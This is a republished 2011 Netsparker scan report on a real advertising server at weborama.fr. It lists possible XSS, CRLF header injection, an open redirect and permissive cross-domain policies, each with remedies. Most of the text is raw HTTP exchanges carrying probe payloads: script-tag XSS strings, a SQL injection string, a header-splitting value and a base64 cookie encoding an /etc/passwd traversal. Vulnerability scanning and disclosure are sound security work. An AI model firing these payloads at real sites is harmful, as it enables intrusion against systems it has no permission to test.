XSS, Cross Site Scripting in ieo.solution.weborama.fr, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

Netsparker - Scan Report Summary
TARGET URL
http://ieo.solution.weborama.fr/fcgi-bin/adse...
SCAN DATE
5/3/2011 1:01:29 AM
REPORT DATE
5/3/2011 1:05:49 AM
SCAN DURATION
00:01:03

Total Requests

4736

Average Speed

74.39 req/sec.
13
identified
7
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
MEDIUM
62 %
LOW
23 %
INFORMATION
15 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/clientaccesspolicy.xml Open Silverlight Client Access Policy Identified Yes
/crossdomain.xml Open Policy Crossdomain.xml Identified Yes
/fcgi-bin/ Forbidden Resource Yes
/fcgi-bin/adserv.fcgi nsextt GET [Possible] Cross-site Scripting No
clicktag GET [Possible] Cross-site Scripting No
clicktag GET [Possible] Cross-site Scripting No
clicktag GET [Possible] Cross-site Scripting No
Cookie Not Marked As HttpOnly Yes
TRACE / TRACK Identified Yes
/fcgi-bin/performance.fcgi URL GET HTTP Header Injection No
URL GET Open Redirection Yes
URL GET Internal Server Error Yes
URL GET E-mail Address Disclosure No
HTTP Header Injection

HTTP Header Injection

1 TOTAL
MEDIUM
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.

Impact

Depending on the application. An attacker might carry out the following forms of attacks:

Actions to Take

  1. See the remedy for solution.
  2. Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow newline characters in input. Where possible use strict white listing.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.

External References

- /fcgi-bin/performance.fcgi

/fcgi-bin/performance.fcgi

http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CRE..

Parameters

Parameter Type Value
ID GET 449484
A GET 1
L GET 496052
C GET 21277
P GET 37169
CREA GET 6
T GET E
URL GET http://example.com/? ns: netsparker056650=vuln

Request

GET /fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=6&T=E&URL=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWaq; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|bc.ci.b0.U.bm.A.cs.b@|a:dbchgfie; _adpe_c=VW60Kqaaaaa; _adpp_c=VW4DuZgrab1taaaa; _advcrea_c=6-|g.b0.U|a:cdb; _adpc_c=VW4DuWar; wr_llc=496052; AFFICHE_W=aUYUfYhYu79n95; wbo_performance=NDQ5NDg0fDQ5NjA1Mnww
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:01:40 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: wr_llc=496052;domain=ieo.solution.weborama.fr;path=/,_adpe_c=VW60Kqaaaaa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:09:52 GMT,_adpp_c=VW4DuZgrab1taaaa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:09:52 GMT,_advcrea_c=6-|g.b0.U|a:cdb; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:09:52 GMT,_adpc_c=VW4DuWas; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:09:52 GMT
ns: netsparker056650=vuln
Location: http://example.com/?
Content-Length: 204
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://example.com/?">here</a>.</p></body></html>
Open Policy Crossdomain.xml Identified

Open Policy Crossdomain.xml Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.

Impact

Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Crossdomain.xml to prevent access from everywhere to your domain.

External References

- /crossdomain.xml

/crossdomain.xml CONFIRMED

http://ieo.solution.weborama.fr/crossdomain.xml

Policy Rules

Request

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWab; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|b0|a:b; AFFICHE_W=aPOZ7xNQu79n94
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:31 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2008 13:27:23 GMT
ETag: "c88006-6c-459af467404c0"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: application/xml


<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>
Open Silverlight Client Access Policy Identified

Open Silverlight Client Access Policy Identified

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Clientaccesspolicy.xml file.

Impact

Open Policy Clientaccesspolicy.xml file allows other Silverlight client services to make HTTP requests to your web server and see its response. This might be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.

Remedy

Configure your Clientaccesspolicy.xml to prevent access from everywhere to your domain.

External References

- /clientaccesspolicy.xml

/clientaccesspolicy.xml CONFIRMED

http://ieo.solution.weborama.fr/clientaccesspolicy.xml

Policy Rules

Request

GET /clientaccesspolicy.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWac; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|b0.bc|a:bc; _adpe_c=VW60Kqa; _adpp_c=VW4DuZgraa; _advcrea_c=6-|b0|a:b; _adpc_c=VW4DuWab; wr_llc=496052; AFFICHE_W=aPOZ7xNQu79n94; wbo_performance=NDQ5NDg0fDQ5NjA1Mnww
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:31 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 19:39:08 GMT
ETag: "b9c005-12a-4866acba3af00"
Accept-Ranges: bytes
Content-Length: 298
Connection: close
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="*"/><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpaths="true"/></grant-to></policy></cross-domain-access></access-policy>
Open Redirection

Open Redirection

1 TOTAL
MEDIUM
CONFIRMED
1
Open Redirection occurs when vulnerable web page is being redirected to another web page via a user controllable input.

Impact

An attacker can use this vulnerability to redirect users to other malicious web sites which can be used for phishing and similar attacks.

Remedy

External References

- /fcgi-bin/performance.fcgi

/fcgi-bin/performance.fcgi CONFIRMED

http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CRE..

Parameters

Parameter Type Value
ID GET 449484
A GET 1
L GET 496052
C GET 21277
P GET 37169
CREA GET 6
T GET E
URL GET http://www.netsparker.com?

Request

GET /fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=6&T=E&URL=http://www.netsparker.com? HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWaz; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|4.g.K.cC.A.cs.b0.ci.bQ.U.bc.q.bm.bG.b@|a:hligfknejdpcobm; _adpe_c=VW60Kqaaaaa; _adpp_c=VW4DuZgrab1taaaaaaaXKqa; _advcrea_c=6-|g.b0.U|a:cdb; _adpc_c=VW4DuWazaaaaaG; wr_llc=496052; AFFICHE_W=aKcBcwJ2u79n29; wbo_performance=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZABwZXJmb3JtYW5jZS5mY2dpfDQ5NjA1MnwwOjQ0OTQ4NHw0OTYwNTJ8MA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 01:01:42 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: wr_llc=496052;domain=ieo.solution.weborama.fr;path=/,_adpe_c=VW60Kqaaaaa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:03:37 GMT,_adpp_c=VW4DuZgrab1taaaaaaaXKqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:03:37 GMT,_advcrea_c=6-|g.b0.U|a:cdb; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:03:37 GMT,_adpc_c=VW4aaaachvmagG; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:03:37 GMT
Location: http://www.netsparker.com?
Content-Length: 210
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.netsparker.com?">here</a>.</p></body></html>
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

4 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /fcgi-bin/adserv.fcgi

/fcgi-bin/adserv.fcgi

http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%..

Parameters

Parameter Type Value
tag GET 496052
f GET 2149
ef GET 1
clicktag GET [URLTRACKING]13256991' or 1=1--
rnd GET [RANDOM]
nsextt GET '"--></style></script><script>alert(0x000004)</script>

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWac; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|b0.bc|a:bc; _adpe_c=VW60Kqa; _adpp_c=VW4DuZgraa; _advcrea_c=6-|b0.U|a:bc; _adpc_c=VW4DuWac; wr_llc=496052; AFFICHE_W=aPOZ7xNQu79n94; wbo_performance=NDQ5NDg0fDQ5NjA1Mnww
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:37 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VW4DuWad; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:04:56 GMT,_adpp=VW4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:04:56 GMT,_adpe=VW60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:04:56 GMT,_advcrea=6-|ci.b0.bc|a:cdb; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:04:56 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript


window['wbo_params'] = {
id: 136,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: '[URLTRACKING]13256991' or 1=1-- &rnd=[RANDOM]&nsextt='"--></style></script><script>netsparker(0x000004)</script>http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=136&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://istatic.weborama.fr/adperf/449484/21277/201104/21081002_gds-ieobanner-box-13-di-16gds-ieobanner-box-6-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304384497'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,'%5BURLTRACKING%5D13256991'%20or%201%3D1--%20%26rnd%3D%5BRANDOM%5D%26nsextt%3D'%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000004)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D136%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20%26rnd%3D%5BRANDOM%5D%26nsextt%3D'%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000004)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D136%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20%26rnd%3D%5BRANDOM%5D%26nsextt%3D'%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000004)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D136%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20%26rnd%3D%5BRANDOM%5D%26nsextt%3D'%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000004)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D136%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx','%5BURLTRACKING%5D13256991'%20or%201%3D1--%20%26rnd%3D%5BRANDOM%5D%26nsextt%3D'%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000004)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D136%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=21277&P=37169&CREA=136&VIDEO_PARAM=',
format_crea1: 'Flash',
format_crea2: '',
host: 'ieo.solution.weborama.fr'
};

document.write('<scr'+'ipt type="text/javascript" id="wbo_lib_' + window.wbo_params['rand'] + '" src="http://istatic.weborama.fr/js/advertiser/format.201104061052.js"></scr'+'ipt>');

function wbo_show_2_136() { return Advertiser201104061052.Expand.show(wbo_creative_136); }
function wbo_hide_2_136() { return Advertiser201104061052.Expand.hide(wbo_creative_136); }
function wbo_close_swf_136() { return Advertiser201104061052.Flash.close(wbo_creative_136); }
if (window.wbo_params['root_x'] != -1 && window.wbo_params['root_y'] != -1) {
window['wbo_swftrans_close'] = function(){ wbo_close_swf_136(); }
}

function event_136() { return Advertiser201104061052.Video.event_for_creative(wbo_creative_136); }
- /fcgi-bin/adserv.fcgi

/fcgi-bin/adserv.fcgi

http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag='%22--%3E%3C/st..

Parameters

Parameter Type Value
tag GET 496052
f GET 2149
ef GET 1
clicktag GET '"--></style></script><script>alert(0x000145)</script>
rnd GET [RANDOM]

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000145)%3C/script%3E&rnd=%5BRANDOM%5D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWbn; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|b@.A.b0.ci.bQ.U.q.bG.g.cC.K.cs.4.bc.bm.bw|a:doemcgpkflbjinhq; _adpe_c=VW60Kqaaaaa; _adpp_c=VW4DuZgrab1taaaahvp--Wd--Zgraaaamzea; _advcrea_c=6-|g.b0.U|a:cdb; _adpc_c=VW4DuWa-aaaabV--aaq; wr_llc=496052; AFFICHE_W=aVM9rgd-u79n42; wbo_performance=NDQ5NDg0fDQ5NjA1Mnww
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:52 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VW4DuWbo; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:09:56 GMT,_adpp=VW4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:09:56 GMT,_adpe=VW60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:09:56 GMT,_advcrea=6-|bw.A.b0.ci.bQ.U.q.bG.b@.g.cC.K.cs.4.bc.bm|a:dpencgqlfmjkiohb; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:09:56 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript


window['wbo_params'] = {
id: 86,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: ''"--></style></script><script>netsparker(0x000145)</script>http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=86&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21080942_gds-ieobanner-box-13-di-16gds-ieobanner-box-16-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304384512'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
clicktag_multiple: new Array(0,''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000145)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag1%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D86%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000145)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag2%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D86%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000145)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag3%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D86%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000145)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag4%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D86%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx',''%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000145)%3C%2Fscript%3Ehttp%3A%2F%2Fieo.solution.weborama.fr%2Ffcgi-bin%2Fperformance.fcgi%3FZ%3Dclicktag5%26ID%3D449484%26A%3D1%26L%3D496052%26C%3D21277%26P%3D37169%26CREA%3D86%26T%3DE%26URL%3Dhttp%253A%252F%252Fwww.ieo.it%252FItaliano%252FPages%252FDefault.aspx'),
wmode: 'opaque',
url_backup: 'http://cstatic.weborama.fr/transp.gif',
video_player: 'http://cstatic.weborama.fr/adperf/player/video.0.4.swf',
flash_min: 6,
video_param: 'http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=5&L=496052&C=21277&P=37169&CREA=86&VIDEO_PARAM=',
format_crea1: 'Flash',
format_crea2: '',
host: 'ieo.solution.weborama.fr'
};

document.write('<scr'+'ipt type="text/javascript" id="wbo_lib_' + window.wbo_params['rand'] + '" src="http://istatic.weborama.fr/js/advertiser/format.201104061052.js"></scr'+'ipt>');

function wbo_show_2_86() { return Advertiser201104061052.Expand.show(wbo_creative_86); }
function wbo_hide_2_86() { return Advertiser201104061052.Expand.hide(wbo_creative_86); }
function wbo_close_swf_86() { return Advertiser201104061052.Flash.close(wbo_creative_86); }
if (window.wbo_params['root_x'] != -1 && window.wbo_params['root_y'] != -1) {
window['wbo_swftrans_close'] = function(){ wbo_close_swf_86(); }
}

function event_86() { return Advertiser201104061052.Video.event_for_creative(wbo_creative_86); }
- /fcgi-bin/adserv.fcgi

/fcgi-bin/adserv.fcgi

http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&cli..

Parameters

Parameter Type Value
tag GET 496052
f GET 2149
ef GET 1
BOUNCE GET OK
brnd GET 43621
clicktag GET '"--></style></script><script>alert(0x00014E)</script>

Notes

Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=43621&clicktag='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00014E)%3C/script%3E HTTP/1.1
Referer: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=%5BURLTRACKING%5D13256991'%20or%201=1--%20&rnd=%5BRANDOM%5D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: ieo.solution.weborama.fr
Cookie: _adpc=VW4DuWbp; _adpp=VW4DuZgraa; _adpe=VW60Kqa; _advcrea=6-|g.A.b0.ci.bQ.U.q.bG.b@.cC.K.cs.4.bc.bm.bw|a:doemcgpkfljbinhq; _adpe_c=VW4aaac0Kqabaaa; _adpp_c=VW4DuZgrab1taaaaaaaXKqa; _advcrea_c=6-|g|a:b; _adpc_c=VW4aaaabhvmasW; wr_llc=0; AFFICHE_W=aIbBNdSavl9n79; wbo_performance=NDQ5NDg0fDB8MA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 01:01:53 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: _adpc=VW4DuWbq; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:08:38 GMT,_adpp=VW4DuZgraa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:08:38 GMT,_adpe=VW60Kqa; domain=.ieo.solution.weborama.fr; path=/; expires=Sun, 03-Jul-2011 00:08:38 GMT,_advcrea=6-|4.A.b0.ci.bQ.U.q.bG.b@.g.cC.K.cs.bc.bm.bw|a:doencgplfmjkibhq; domain=.ieo.solution.weborama.fr; path=/; expires=Fri, 12-Aug-2011 00:08:38 GMT
Pragma: no-cache
Cache-Control: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-javascript


window['wbo_params'] = {
id: 56,
tag: '496052',
site: '449484',
w: 298,
h: 250,
root_x: '-1',
root_y: '-1',
zindex: '4242',
clic: ''"--></style></script><script>netsparker(0x00014E)</script>http://ieo.solution.weborama.fr/fcgi-bin/performance.fcgi?ID=449484&A=1&L=496052&C=21277&P=37169&CREA=56&T=E&URL=http%3A%2F%2Fwww.ieo.it%2FItaliano%2FPages%2FDefault.aspx',
target: '_blank',
url: 'http://elstatic.weborama.fr/adperf/449484/21277/201104/21080930_gds-ieobanner-box-13-di-16gds-ieobanner-box-13-di-16.swf',
pixel: '',
format: 'Flash',
rand: '1304384513'+'_'+new Date().getTime(),
partner: '37169',
clicktag: 'clicktag',
